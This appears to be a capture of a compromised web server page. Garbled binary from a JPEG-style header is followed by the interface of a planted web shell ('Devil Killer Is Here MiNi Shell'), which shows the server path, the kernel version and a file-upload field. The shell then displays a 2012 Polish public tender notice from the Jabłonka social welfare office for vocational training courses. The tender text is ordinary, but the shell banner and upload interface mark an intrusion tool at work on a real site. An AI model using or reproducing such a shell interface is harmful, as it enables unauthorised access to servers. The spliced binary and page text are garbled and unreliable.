JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120416/86115-N-2012.html

<p class="kh_header"><b>Jabłonka: Zorganizowanie i przeprowadzenie szkoleń i kursów zawodowych dla uczestników projektu systemowego pt. ZAUFAJ INNYM - POMÓŻ SOBIE. Program aktywizacji zawodowej i społecznej w Gminie Jabłonka</b><br>
<b>Numer ogłoszenia: 86115 - 2012; data zamieszczenia: 16.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej w Jabłonce , ul. 3-go Maja 1, 34-480 Jabłonka, woj. małopolskie, tel. 18 26 111 48, faks 18 26 111 48.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu gimnnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń i kursów zawodowych dla uczestników projektu systemowego pt. ZAUFAJ INNYM - POMÓŻ SOBIE. Program aktywizacji zawodowej i społecznej w Gminie Jabłonka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi p.n.: 
Zorganizowanie i przeprowadzenie szkoleń i kursów zawodowych dla uczestników projektu systemowego pt. ZAUFAJ INNYM - POMÓŻ SOBIE. Program aktywizacji zawodowej i społecznej w Gminie Jabłonka

Ze względu na specyfikę zamówienia podzielono na 8 części
2. Szczegółowy opis przedmiotu zamówienia: 
Przedmiotem zamówienia jest wyłonienie instytucji szkoleniowej, której zadaniem będzie zorganizowanie i przeprowadzenie szkoleń i kursów pn. 

a)	Szkolenie Warsztaty aktywnego poszukiwania pracy oraz konsultacje indywidualne z doradcą zawodowym 
- przewidywana liczba osób - 21
- program warsztatów powinien obejmować 20 godzin dydaktycznych zajęć grupowych (warsztaty aktywnego poszukiwania pracy, tj opracowanie CV, listu motywacyjnego, przygotowanie do rozmowy kwalifikacyjnej)
- konsultacje indywidualne powinny obejmować 3 godziny dydaktyczne na osobę (opracowanie Indywidualnego Planu Działania)
- okres realizacji szkolenia: do 30 czerwca 2012 roku 

b)	Szkolenie Trening kompetencji i umiejętności społecznych oraz konsultacje indywidualne z psychologiem
- przewidywana liczba osób - 21
- program warsztatów powinien obejmować 20 godzin dydaktycznych zajęć grupowych (trening kompetencji społecznych - nauka umiejętności komunikacji interpersonalnej, trening asertywności, trening umiejętności wychowawczych) 
   
- konsultacje indywidualne powinny obejmować 5 godzin dydaktycznych na osobę  okres realizacji szkolenia: do 30 czerwca 2012 roku 

c)	Kurs w zakresie kucharz, barman, kelner
- przewidywana liczba osób - 4
- program zajęć teoretycznych i praktycznych powinien obejmować 120 godzin dydaktycznych 
- okres realizacji szkolenia: do 30 września 2012 roku 

d)	Kurs w zakresie Przedstawiciel handlowy wraz z prawem jazdy kat. B 
- przewidywana liczba osób - 11
- program zajęć teoretycznych i praktycznych powinien obejmować 180 godzin dydaktycznych 
- okres realizacji szkolenia: do 31 października 2012 roku 
- kurs prawa jazdy powinien zakończyć się egzaminem państwowym

e)	Kurs w zakresie Magazynier z obsługą wózka widłowego (silnikowego i elektrycznego) z uprawnieniami do wymiany butli gazowej 
- przewidywana liczba osób - 2
- program zajęć teoretycznych i praktycznych powinien obejmować 65 godzin dydaktycznych 
- okres realizacji szkolenia: do 30 września 2012 roku
 
f)	Kurs w zakresie Opiekun nad osobami starszymi
- przewidywana liczba osób - 2
- program zajęć teoretycznych i praktycznych powinien obejmować 120 godzin dydaktycznych 
- okres realizacji szkolenia: do 30 września 2012 roku 

g)	Kurs w zakresie Sprzedawca z obsługą komputera i kasy fiskalnej 
- przewidywana liczba osób - 1
- program zajęć teoretycznych i praktycznych powinien obejmować 100 godzin dydaktycznych 
- okres realizacji szkolenia: do 30 września 2012 roku 

h)	Kurs w zakresie Florysta 
- przewidywana liczba osób - 1
- program zajęć teoretycznych i praktycznych powinien obejmować 80 godzin dydaktycznych 
- okres realizacji szkolenia: do 30 września 2012 roku 


CPV (Wspólny Słownik Zamówień) 	
- 80.50.00.00-9 Usługi szkoleniowe 
- 80.53.00.00-8 Usługi szkolenie zawodowego 
- 80.51.00.00-2 Usługi szkolenia specjalistycznego
- 80.57.00.00-0 Usługi szkolenia w dziedzinie rozwoju osobistego

Ilość uczestników projektu (osób biorących udział w poszczególnych szkoleniach/kursach może ulec zmianie - zmniejszeniu lub zwiększeniu). Zamawiający nie ponosi konsekwencji za zmniejszenie ilości uczestników.
W przypadku braku wystarczającej liczby zgłoszonych uczestników na dane szkolenie/kurs Zamawiający ma prawo natychmiastowego odstąpienia od umowy bez ponoszenia z tego tytułu konsekwencji finansowych. W tym wypadku Wykonawcy nie przysługują żadne roszczenia finansowo-prawne.

3. Inne postanowienia dotyczące przedmiotu zamówienia:
1)	Wykonawca zorganizuje i przeprowadzi szkolenia, które winny trwać w ilości godzin jak w punkcie 1. 
2)	Wykonawca zapewni ciepły posiłek składający się z dwóch dań w przerwie zajęć szkoleniowych, (co najmniej półgodzinnej) zgodnie z obowiązującymi w tym zakresie przepisami prawa. Koszt posiłków należy uwzględnić w cenie szkolenia. Odbiór musi zostać pokwitowany przez uczestników szkolenia
3)	Wykonawca zapewni serwis kawowy (15 minutowy) jeden raz w każdym dniu szkolenia - w trakcie, którego podawana będzie kawa, mleko do kawy, herbata, cytryna do herbaty, soki owocowe, woda mineralna, ciasteczka, cukier) zgodnie z obowiązującymi w tym zakresie przepisami prawa. Koszt posiłków należy uwzględnić w cenie szkolenia. Odbiór musi zostać pokwitowany przez uczestników szkolenia
4)	Program szkolenia nie może być uzupełniany o tematykę niezwiązaną z zakresem szkolenia.
5)	Program winien być zgodny z krajowymi standardami kwalifikacji zawodowych i modułowych programów szkolenia zawodowego znajdującymi się w internetowej bazie danych, znajdującej się na serwerze Ministerstwa Pracy i Polityki Społecznej www.standardyiszkolenia.praca.gov.pl oraz powinien odpowiadać wymogom określonym w § 5 Rozporządzenia Ministra Edukacji i Nauki z dnia 03 lutego 2006 roku w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U. Nr 31 z 2006r. Poz.216).
6)	Osoby prowadzące zajęcia muszą posiadać odpowiednie przygotowanie merytoryczne do prowadzenia zajęć powierzonych im przez Wykonawcę
7)	Uczestnicy szkolenia muszą zostać wyposażeni w obowiązkowe materiały szkoleniowe w postaci: 
zeszyt,    
długopis,       
materiały dydaktyczne z zakresu tematyki objętej programem szkolenia. 
Wymienione powyżej materiały każdy uczestnik szkolenia otrzyma na własność. Jeden egzemplarz materiałów dydaktycznych otrzymuje Zamawiający.
Materiały te należy uwzględnić w kalkulacji kosztów szkolenia. Odbiór materiałów musi zostać pokwitowany przez uczestników szkolenia (na początku szkolenia bądź na bieżąco zgodnie z realizowanym tematem zajęć). 
8)	Zamawiający wymaga, aby materiały szkoleniowe, zaświadczenia, ankiety, dyplomy, świadectwa, ankiety certyfikaty przekazywane nieodpłatnie każdemu uczestnikowi szkolenia jak również dokumentacja szkolenia oraz pomieszczenia szkoleniowe były: 
oznakowane  (logo Unii Europejskiej oraz Kapitału Ludzkiego zgodne z wytycznymi w tym zakresie)  strona http://www.efs.gov.pl/ w zakładce Zasady promocji.
9)	Podczas realizacji części praktycznej szkolenia, uczestnicy będą mieć dostęp do niezbędnych materiałów, produktów oraz sprzętu itp., co należy uwzględnić w cenie szkolenia
10)	Wymaga się, aby szkolenie trwało w tygodniu przeciętnie nie więcej niż 40 godzin dydaktycznych zgodnie z art. 40 ust. 4 ustawy o promocji zatrudnienia i instytucjach rynku pracy z dnia 20 kwietnia 2004 r. (Dz. U. z 2008 r. Nr 69, poz. 415 ze zm.). Godzina dydaktyczna kursu liczy 45 minut, długość przerw może być ustalana w sposób elastyczny. 
11)	Zajęcia muszą się odbywać w godzinach między 8.00 rano a 16.00 w dni robocze od poniedziałku do piątku. 
12)	Szkolenie powinno mieć opiekuna z ramienia Wykonawcy, czyli osobę odpowiedzialną za organizację szkolenia, wskazaną do kontaktu z uczestnikami szkolenia oraz Zamawiającym (załącznik nr 7 do SIWZ). 
13)	Lokal, w którym będą przeprowadzane zajęcia teoretyczne i praktyczne powinien być przestronny i przewiewny, posiadać dostęp do pomieszczeń sanitarnych oraz winien gwarantować w trakcie szkolenia wymogi bezpieczeństwa i higieny pracy w tym zakresie. Ponadto powinien być wyposażony w pomoce dydaktyczne i sprzęt dostosowane do prowadzenia szkoleń będących przedmiotem zamówienia. 
14)	Miejscem wykonania zamówienia może być teren miejscowości Jabłonka lub miejsce oddalone od siedziby zamawiającego do 30 km, pod warunkiem, że Wykonawca zapewni dojazd uczestników szkolenia z Jabłonki do miejsca odbywania szkolenia oraz transport powrotny. Koszty dojazdów należy uwzględnić w cenie szkolenia
15)	Szkolenie winno być przeprowadzone zgodnie z programem szkolenia (załącznik nr SIWZ) 9 do oraz przedstawionym harmonogramem zawierającym: poszczególne dni szkolenia z planem godzinowym zajęć, tematyką i osobą prowadzącą w ujęciu tygodniowym.
16)	Szkolenie zakończy się egzaminem zawierającym zagadnienia zarówno teoretyczne jak i praktyczne z tematyki przeprowadzonego szkolenia. 
17)	Wykonawca odpowiedzialny będzie za: 
CV oraz kwalifikacje osób prowadzących zajęcia,
przygotowanie szczegółowego programu szkolenia - załącznik nr 9 do SIWZ 
zapewnienie materiałów biurowych, eksploatacyjnych i dydaktycznych dla uczestników,
zapewnienie nadzoru nad organizacją szkolenia i realizacją programu merytorycznego,
ubezpieczenie uczestników szkolenia/kursu okres jego trwania od następstw NW,
dziennik zajęć wraz z listą obecności,
sprawozdanie z realizacji zajęć,
18)	W kwestiach niezawartych w powyższej specyfikacji Wykonawca zobowiązany jest do 
uzgodnienia z 	Zamawiającym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie pobiera Wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie zrealizowania i przeprowadzenia z należytą starannością w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej usługi polegającej na przeprowadzeniu szkoleń o tematyce zgodnej z przedmiotem zamówienia dla minimum 5 osób dla poszczególnych części zamówienia (w zależności, na jakie części zostanie złożona oferta) tj. 
szkolenie co najmniej 5 osób w zakresie doradztwa zawodowego zrealizowanych w ramach usług szkoleniowych
szkolenie co najmniej 5 osób w zakresie treningów kompetencji społecznych lub treningów kompetencji psychospołecznych zrealizowanych w ramach usług szkoleniowych,
szkolenie/kurs co najmniej 5 osób w zakresie przedstawiciel handlowy wraz prawem jazdy kat B lub przedstawiciel handlowy 
szkolenie/ kurs co najmniej 5 osób w zakresie kucharz lub barman lub kelner 
szkolenie/kurs co najmniej 5 osób w zakresie magazynier z obsługa wózka widłowego (silnikowego lub elektrycznego)
szkolenie/kurs co najmniej 5 osób w zakresie opiekun nad osobami starszymi 
szkolenie/kurs co najmniej 5 osób w zakresie sprzedawca z obsługą komputera i kasy fiskalnej,
szkolenie/kurs co najmniej 5 osób w zakresie florystyki
w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te zamówienia zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że dysponuje specjalistami posiadającymi wiedzę teoretyczną oraz przygotowanie praktyczne w zakresie tematyki szkoleń.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Inne dokumenty:
1.1. Formularz oferty przetargowej (Załącznik nr 1 do SIWZ);
1.2. Ogólne informacje dotyczące Wykonawcy (Załącznik nr 2 do SIWZ);
1.3. W przypadku Konsorcjum należy dołączyć szczegółową informację o Wykonawcach stanowiących Konsorcjum (Załącznik nr 2a do SIWZ);
1.4. Pełnomocnictwo do reprezentowania wykonawcy w postępowaniu albo do reprezentowania wykonawcy w postępowaniu i do zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentowania we właściwym rejestrze 
1.5. Oświadczenia - załącznik nr 3a, 3b, 3c, 4 i 10 SIWZ
1.6. Wykaz osób do kontaktów - załącznik nr 7 do SIWZ
1.7. Program szkoleniowy załącznik nr 9 do SIWZ ( dla każdego szkolenia/kursu oddzielnie)
2.	Oferta oraz wszystkie wymagane załączniki wymagają podpisu osób uprawnionych do reprezentowania Wykonawcy, zgodnie z wymaganiami ustawowymi. W przypadku, kiedy ofertę składa kilka podmiotów wspólnie, ofertę oraz wszystkie załączniki muszą być podpisane przez osoby uprawnione do reprezentowania każdego z podmiotów.
3.	 Wykonawcy wspólnie ubiegający się o udzielnie zamówienia winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie niniejszego postępowania. Do oferty należy załączyć pełnomocnictwo do reprezentowania wszystkich Wykonawców ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo, o ile nie wynika to z innych dokumentów załączonych przez Wykonawcę.
4.	Sposób oceny spełniania warunków udziału w postępowaniu: Ocena spełnienia powyższych warunków będzie dokonywana metodą spełnia - nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż Wykonawca spełnił w/w warunki.
5.	Uzupełnienie wymaganych dokumentów jest możliwe po upływie terminu składania ofert na podstawie art. 26 ust. 3.
6.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: - wymagane w pkt III.42 niniejszej części dokumenty winien złożyć każdy Wykonawca. Pozostałe dokumenty wymagane w niniejszej części winny być złożone wspólnie przez Wykonawców. 
7. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
8. Wykonawca może występować tylko w jednej Ofercie, czy to indywidualnie czy też jako Partner Konsorcjum w odniesieniu do tego samego zadania inwestycyjnego. 
9. W celu potwierdzenia spełnienia opisanych wyżej warunków Wykonawca musi załączyć do oferty dokumenty określone w Rozdziale 12 SIWZ na podstawie, których zostanie dokonana ocena spełnienia warunków określonych w Rozdziale 11 SIWZ. 
10. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.
11. Zamawiający wezwie w trybie art.26 ust.3 Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub, którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie chyba, że mimo ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- zaistnienie, po zawarciu umowy, przypadku siły wyższej, przez którą, na potrzeby niniejszego warunku, rozumieć należy zdarzenie zewnętrzne wobec łączącej strony więzi prawnej:
- o charakterze niezależnym od stron,
- którego strony nie mogły przewidzieć przed zawarciem umowy, 
- którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu, należytej staranności
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar, i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamanie warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia.
- zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia.
- powstanie rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usuniecie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony;
- zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi bądź okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie mogą ulec termin realizacji umowy oraz terminy wynikające z harmonogramu;
- gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - Zamawiający dopuszcza możliwość zmiany umowy, w szczególności terminu realizacji zamówienia.
- zmiany terminu rozpoczęcia lub zakończenia szkolenia wywołanej w szczególności nie skompletowaniem na czas pełnej grupy szkoleniowej lub z powodu nagłej i znacznej ilości rezygnacji przez uczestników szkolenia oraz wystąpienia zdarzeń losowych; 
- zmiany w kadrze dydaktycznej, gdy konieczność jej dokonania wynika z przyczyn losowych, niezależnych od Wykonawcy. Zmiana ta nie może prowadzić do obniżenia wymagań określonych w SIWZ. Jeżeli Zamawiający uzna, że przyczyna jest uzasadniona Wykonawca musi przedstawić nową kandydaturę o kwalifikacjach spełniających kryteria zawarte w SIWZ; 
